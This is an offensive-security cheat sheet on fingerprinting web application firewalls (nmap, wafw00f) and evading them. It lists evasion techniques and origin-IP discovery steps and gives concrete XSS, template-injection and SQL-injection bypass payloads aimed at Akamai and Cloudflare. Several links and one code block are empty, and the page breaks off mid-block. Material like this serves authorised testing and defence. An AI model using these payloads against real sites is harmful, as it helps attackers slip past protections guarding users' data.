# WAF (Web Application Firewall) Detection
WAF (Web Application Firewall) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service.
### Automation
```shellscript
nmap --script=http-waf-fingerprint example.com
wafw00f https://example.com
```
## WAF Bypasses
**Encoding Evasion**: Use URL, Unicode, Base64, or other encodings to disguise payloads.
**HTTP Parameter Pollution**: Manipulate parameters to exploit the way the WAF processes multi-instance parameters. (One of my favourite techniques!)
**Session Splicing**: Divide the attack into multiple requests or sessions to disrupt the WAF's ability to correlate the events.
**Verb Tampering**: Change the HTTP method (GET, POST, HEAD, etc.) to an unconventional one that the WAF might not inspect.
**Path Obfuscation**: Include irrelevant path information that gets ignored by the server but confuses the WAF (like using directory traversal techniques).
**Query String Manipulation**: Alter the query string with special characters or payloads that might be overlooked by the WAF.
**Header Manipulation**: Modify HTTP headers such as `User-Agent`, `Referer`, or custom headers in ways that are not expected.
**Cookie Poisoning**: Inject payloads into cookie values which may not be inspected or properly sanitized by the WAF.
**Content-Type Evasion**: Use unusual or mismatched content-types in the HTTP header to bypass checks that are content-type specific.
**Extension Manipulation**: Changing file extensions or using obscure ones to evade filters that inspect file names.
**Protocol-Level Evasion**: Utilize discrepancies in protocol implementations (like ambiguous requests) that may be differently interpreted by the WAF and the target web server.
**Attack Obfuscation with Legitimate Requests**: Mix in legitimate traffic with the attack traffic to reduce the anomaly score that might otherwise trigger the WAF.
**Bypassing with JavaScript**: Use JavaScript to construct the final payload in the client-side browser, which may not be executed or recognized by the WAF.
**Using Comment Injection**: Place comments within SQL statements or scripts to disrupt signature detection.
**Utilizing Server-Side Request Forgery (SSRF)**: Exploit the server's functionality to make requests that bypass the WAF's rules.
**Timing Attacks**: Execute actions with delays, leveraging the fact that some WAFs have a time window for rule execution.
**Ruleset Flaws**: Exploit known weaknesses in the rulesets employed by popular WAFs, which are sometimes documented by security researchers.
{% embed url="" %}
bash usage example:
```bash
bypass-firewalls-by-DNS-history.sh -d example.com
```
References:
*
*
*
* Domain IP history:
* Bypasses and info:
*
*
***
## Manual identification
```bash
dig +short target.com
curl -s https://ipinfo.io/ | jq -r '.com'
```
Always check DNS History for original IP leak:
*
***
## WAF detection
```bash
nmap --script=http-waf-fingerprint victim.com
nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 victim.com
nmap -p80 --script http-waf-detect --script-args="http-waf-detect.aggro " victim.com
wafw00f victim.com
```
***
## Good bypass payload examples
```
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0It%0A%3Aalert(0)
javascript:”/*’/*`/* →
```
Try accessing alternate hostnames or paths that may reveal origin servers:
* dev.domain.com
* stage.domain.com
* ww1/ww2/ww3...domain.com
* [www.domain.uk/jp/](http://www.domain.uk/jp/)
***
## Akamai
Target origin hostnames:
* origin.sub.domain.com
* origin-sub.domain.com
Send header:
```
Pragma: akamai-x-get-true-cache-key
```
Payload examples:
```
{{constructor.constructor(alert`1`)()}}
\');confirm(1);//
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
```
***
## ModSecurity Bypass
```html
```
***
## Cloudflare
```bash
python3 cloudflair.py domain.com
```
Cloudflare enumeration:
*
* Example: cloudflare\_enum.py disney.com
*
*
Cloudflare bypass payload examples:
```html
alert(1)
X